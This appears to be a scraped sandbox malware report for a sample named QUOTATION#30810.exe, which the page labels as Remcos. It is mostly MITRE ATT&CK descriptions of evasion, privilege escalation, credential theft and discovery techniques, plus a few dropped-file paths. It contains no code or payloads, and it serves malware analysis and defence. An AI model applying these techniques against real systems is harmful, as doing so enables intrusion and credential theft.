Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION#30810.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_6413c1d758d05ac66ec1e932ad11c4ede3c5baec_e985c620_ab02bc0d-5004-4913-b03b-cd02929db587\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_6413c1d758d05ac66ec1e932ad11c4ede3c5baec_e985c620_e3b4bcab-41f1-4d9c-8e7a-1e4df3abbd61\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_a87cad5a9d7cd3eaa526cd4c3d9022aa107d4af_e985c620_8737a0d3-176e-49ae-9fbf-3c034a98ab5f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1988.tmp.dmp

Windows Analysis Report
QUOTATION#30810.exe

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre